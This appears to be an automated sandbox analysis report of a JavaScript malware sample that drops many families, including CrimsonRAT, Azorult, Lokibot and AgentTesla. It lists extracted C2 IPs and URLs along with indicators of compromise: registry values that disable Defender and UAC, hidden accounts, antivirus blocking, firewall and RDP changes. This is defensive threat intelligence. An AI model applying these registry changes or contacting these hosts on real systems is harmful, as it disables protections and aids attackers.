Analysis
-
max time kernel
377s -
max time network
378s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
30/03/2025, 20:09
Static task
static1
Behavioral task
behavioral1
Sample
sample.js
Resource
win10ltsc2021-20250314-en
General
-
Target
sample.js
-
Size
53KB
-
MD5
e2c5156b386c889875d3fc98774d26d5
-
SHA1
21bb3b153e2c708befe694f8b1a24bd6e37adc68
-
SHA256
604c27419204d6b85c901437a9205563f5d3353930cd4616b66852d8a761d710
-
SHA512
81bbffb5d7aa8e754704b07eb1e2bf4c24ad972fb0424c9f94489dd8017939582fb3fb7b5ce0d6e690d1b30377818211ee62e5e98a429f5d74b1a7845b9d9227
-
SSDEEP
1536:I69UFuC7TcGoHzhWSSgO2NpAEjkcq6h6ZsnVJrmNC8KjnC5L6VK9efWT672PMEPa:H9UFumcGoHzhWSSgO2NpAEjkcq6h6Zsl
Malware Config
Extracted
crimsonrat
185.136.161.124
Extracted
azorult
http://boglogov.site/index.php
Extracted
lokibot
http://blesblochem.com/two/gates1/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000028095-1234.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Lokibot family
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult(1).exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult(1).exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Rms family
-
UAC bypass 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 5448 net.exe 3724 net1.exe -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" Azorult(1).exe Set value (int) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult(1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" Azorult(1).exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe 206 4456 firefox.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult(1).exe -
Modifies Windows Firewall 2 TTPs 22 IoCs
pid Process 4196 netsh.exe 5220 netsh.exe 2824 netsh.exe 3136 netsh.exe 5948 netsh.exe 5848 netsh.exe 5704 netsh.exe 344 netsh.exe 704 netsh.exe 3728 netsh.exe 5148 netsh.exe 344 netsh.exe 5832 netsh.exe 5496 netsh.exe 3980 netsh.exe 4620 netsh.exe 5976 netsh.exe 3788 netsh.exe 4564 netsh.exe 5568 netsh.exe 1312 netsh.exe 792 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3356 attrib.exe 3760 attrib.exe 5040 attrib.exe -
Stops running service(s) 4 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x00070000000280ee-1577.dat acprotect behavioral1/files/0x00070000000280ed-1576.dat acprotect -
resource yara_rule behavioral1/files/0x00070000000280eb-1539.dat aspack_v212_v242 behavioral1/files/0x00070000000280ea-1580.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation wini.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation cheat.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation taskhost.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation Azorult(1).exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation VanToM-Rat(1).bat Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation R8.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation winlog.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation winlogon.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 64 IoCs
pid Process 5960 CrimsonRAT.exe 2720 dlrarhsiva.exe 5240 VanToM-Rat(1).bat 416 Server.exe 5376 Azorult(1).exe 3788 wini.exe 2980 winit.exe 5944 Lokibot.exe 2520 rutserv.exe 3128 rutserv.exe 5732 rutserv.exe 2612 rutserv.exe 2584 rfusclient.exe 4052 rfusclient.exe 4552 cheat.exe 832 ink.exe 4520 taskhost.exe 4804 P.exe 2180 rfusclient.exe 5444 R8.exe 5824 winlog.exe 4720 Rar.exe 5156 winlogon.exe 1512 RDPWInst.exe 936 taskhostw.exe 4196 taskhostw.exe 4924 taskhostw.exe 4984 RDPWInst.exe 1512 winlogon.exe 5876 Apex.exe 5212 Lokibot.exe 2676 taskhostw.exe 3800 taskhostw.exe 4520 taskhostw.exe 1604 taskhostw.exe 5480 taskhostw.exe 5948 AgentTesla.exe 4336 taskhostw.exe 5012 taskhostw.exe 5832 taskhostw.exe 1560 taskhostw.exe 3416 butterflyondesktop.exe 4320 butterflyondesktop.tmp 5776 taskhostw.exe 4220 taskhostw.exe 3052 taskhostw.exe 5216 taskhostw.exe 3656 taskhostw.exe 1412 taskhostw.exe 4828 ButterflyOnDesktop.exe 6436 taskhostw.exe 6452 taskhostw.exe 7104 taskhostw.exe 7112 taskhostw.exe 6800 taskhostw.exe 6496 taskhostw.exe 6708 taskhostw.exe 6692 taskhostw.exe 7080 taskhostw.exe 3840 taskhostw.exe 4784 taskhostw.exe 6436 taskhostw.exe 6780 taskhostw.exe 6700 taskhostw.exe -
Modifies file permissions 1 TTPs 62 IoCs
pid Process 5764 icacls.exe 2564 icacls.exe 5904 icacls.exe 4440 icacls.exe 2372 icacls.exe 4892 icacls.exe 3244 icacls.exe 1828 icacls.exe 4588 icacls.exe 3572 icacls.exe 352 icacls.exe 4220 icacls.exe 5972 icacls.exe 2372 icacls.exe 4840 icacls.exe 5372 icacls.exe 5888 icacls.exe 4460 icacls.exe 5816 icacls.exe 792 icacls.exe 5668 icacls.exe 5432 icacls.exe 2492 icacls.exe 5736 icacls.exe 4196 icacls.exe 5940 icacls.exe 5880 icacls.exe 5800 icacls.exe 5012 icacls.exe 5148 icacls.exe 5220 icacls.exe 5880 icacls.exe 3572 icacls.exe 5772 icacls.exe 5124 icacls.exe 5436 icacls.exe 5964 icacls.exe 5800 icacls.exe 4804 icacls.exe 5928 icacls.exe 5480 icacls.exe 5192 icacls.exe 3136 icacls.exe 3760 icacls.exe 5576 icacls.exe 1604 icacls.exe 5684 icacls.exe 2564 icacls.exe 3184 icacls.exe 1808 icacls.exe 4332 icacls.exe 5148 icacls.exe 5216 icacls.exe 4600 icacls.exe 4980 icacls.exe 4684 icacls.exe 4484 icacls.exe 4272 icacls.exe 1640 icacls.exe 5452 icacls.exe 3184 icacls.exe 1496 icacls.exe -
Modifies system executable filetype association 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/5944-1537-0x00000000026E0000-0x00000000026F4000-memory.dmp agile_net -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MediaPath = "C:\\Rundll32.exe" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Rundll32 = "C:\\Rundll32.exe" Gruel.a.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\Downloads\\VanToM-Rat(1).bat" VanToM-Rat(1).bat Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Roaming\\VanToM Folder\\Server.exe" Server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnceEX\DevicePath = "C:\\Rundll32.exe" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop butterflyondesktop.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microzoft_Ofiz = "C:\\Windows\\KdzEregli.exe" Amus.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult(1).exe -
pid Process 5952 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs
flow ioc 205 raw.githubusercontent.com 214 camo.githubusercontent.com 525 raw.githubusercontent.com 206 raw.githubusercontent.com 215 camo.githubusercontent.com 216 camo.githubusercontent.com 217 camo.githubusercontent.com 266 raw.githubusercontent.com 274 raw.githubusercontent.com 524 raw.githubusercontent.com 207 raw.githubusercontent.com 208 raw.githubusercontent.com 283 iplogger.org 523 raw.githubusercontent.com 276 raw.githubusercontent.com 282 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 252 ip-api.com -
Modifies WinLogon 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult(1).exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult(1).exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult(1).exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult(1).exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00070000000280c3-1404.dat autoit_exe behavioral1/files/0x00070000000280ec-1502.dat autoit_exe behavioral1/files/0x00080000000280f5-1615.dat autoit_exe behavioral1/memory/1512-1801-0x0000000000C40000-0x0000000000D2C000-memory.dmp autoit_exe -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File created C:\Windows\SysWOW64\wsock32.ska Happy99.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini powershell.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe File created C:\Windows\SysWOW64\Ska.exe Happy99.exe File created C:\Windows\SysWOW64\Ska.exe:Zone.Identifier:$DATA Happy99.exe File created C:\Windows\SysWOW64\Ska.dll Happy99.exe File opened for modification C:\Windows\SysWOW64\wsock32.dll Happy99.exe -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult(1).exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5944 set thread context of 5212 5944 Lokibot.exe 363 -
resource yara_rule behavioral1/files/0x00070000000280ee-1577.dat upx behavioral1/files/0x00070000000280ed-1576.dat upx behavioral1/files/0x000800000002812e-1722.dat upx behavioral1/memory/5156-1731-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/5156-1756-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/1512-1799-0x0000000000C40000-0x0000000000D2C000-memory.dmp upx behavioral1/memory/1512-1801-0x0000000000C40000-0x0000000000D2C000-memory.dmp upx -
Drops file in Program Files directory 43 IoCs
description ioc Process File opened for modification C:\Program Files\AVG Azorult(1).exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File created C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config AgentTesla.exe File created C:\Program Files (x86)\Butterfly on Desktop\unins000.dat butterflyondesktop.tmp File opened for modification C:\Program Files\SpyHunter Azorult(1).exe File opened for modification C:\Program Files (x86)\Kaspersky Lab Azorult(1).exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe AgentTesla.exe File created C:\Program Files (x86)\Butterfly on Desktop\is-FOM9P.tmp butterflyondesktop.tmp File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus Azorult(1).exe File opened for modification C:\Program Files (x86)\Panda Security Azorult(1).exe File created C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll AgentTesla.exe File created C:\Program Files (x86)\Butterfly on Desktop\is-DSAD2.tmp butterflyondesktop.tmp File opened for modification C:\Program Files (x86)\Microsoft JDX Azorult(1).exe File opened for modification C:\Program Files (x86)\Zaxar Azorult(1).exe File opened for modification C:\Program Files\ByteFence Azorult(1).exe File opened for modification C:\Program Files\Kaspersky Lab Azorult(1).exe File created C:\Program Files\Common Files\System\iediagcmd.exe Azorult(1).exe File opened for modification C:\Program Files\Malwarebytes Azorult(1).exe File opened for modification C:\Program Files\Cezurity Azorult(1).exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File created C:\Program Files (x86)\Butterfly on Desktop\is-KK5O5.tmp butterflyondesktop.tmp File opened for modification C:\Program Files (x86)\SpyHunter Azorult(1).exe File opened for modification C:\Program Files (x86)\AVAST Software Azorult(1).exe File opened for modification C:\Program Files\Common Files\McAfee Azorult(1).exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File opened for modification C:\Program Files\ESET Azorult(1).exe File created C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll AgentTesla.exe File created C:\Program Files (x86)\Butterfly on Desktop\is-MBF3L.tmp butterflyondesktop.tmp File opened for modification C:\Program Files (x86)\360 Azorult(1).exe File opened for modification C:\Program Files\COMODO Azorult(1).exe File opened for modification C:\Program Files\Enigma Software Group Azorult(1).exe File opened for modification C:\Program Files (x86)\AVG Azorult(1).exe File opened for modification C:\Program Files (x86)\Cezurity Azorult(1).exe File created C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml AgentTesla.exe File opened for modification C:\Program Files (x86)\Butterfly on Desktop\unins000.dat butterflyondesktop.tmp File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files\AVAST Software Azorult(1).exe -
Drops file in Windows directory 35 IoCs
description ioc Process File created C:\Windows\Pide.exe Amus.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_1033860236\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_1528554024\manifest.json msedge.exe File created C:\Windows\KdzEregli.exe Amus.exe File opened for modification C:\Windows\Ankara.exe Amus.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_5731964\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_1033860236\office_endpoints_list.json msedge.exe File created C:\Windows\Pire.exe Amus.exe File opened for modification C:\Windows\Pire.exe Amus.exe File opened for modification C:\Windows\Cekirge.exe Amus.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_1033860236\manifest.json msedge.exe File created C:\Windows\Ankara.exe Amus.exe File created C:\Windows\Adapazari.exe Amus.exe File created C:\Windows\Anti_Virus.exe Amus.exe File opened for modification C:\Windows\Messenger.exe Amus.exe File created C:\Windows\Meydanbasi.exe Amus.exe File opened for modification C:\Windows\KdzEregli.exe Amus.exe File opened for modification C:\Windows\Pide.exe Amus.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_1528554024\manifest.fingerprint msedge.exe File opened for modification C:\Windows\Adapazari.exe Amus.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_5731964\manifest.fingerprint msedge.exe File opened for modification C:\Windows\logs\StorGroupPolicy.log svchost.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_373103432\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_373103432\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_1528554024\protocols.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_5731964\nav_config.json msedge.exe File created C:\Windows\Messenger.exe Amus.exe File created C:\Windows\Cekirge.exe Amus.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5248_1033860236\smart_switch_list.json msedge.exe File opened for modification C:\Windows\Anti_Virus.exe Amus.exe File created C:\Windows\My_Pictures.exe Amus.exe File opened for modification C:\Windows\My_Pictures.exe Amus.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\Meydanbasi.exe Amus.exe File created C:\windows\Program Files\Kazaa\My Shared Folder\Norton 2003 Pro.exe Gruel.a.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2444 sc.exe 3760 sc.exe 3260 sc.exe 4868 sc.exe 2704 sc.exe 1640 sc.exe 1664 sc.exe 5212 sc.exe 2852 sc.exe 1412 sc.exe 5568 sc.exe 508 sc.exe 5152 sc.exe 4552 sc.exe 5460 sc.exe 4864 sc.exe 2672 sc.exe 3308 sc.exe 5668 sc.exe 3236 sc.exe 5236 sc.exe 2764 sc.exe 1664 sc.exe 536 sc.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 12 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File created C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Duksten.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Azorult(1).exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Apex.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Amus.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Gruel.a.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Happy99.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier firefox.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
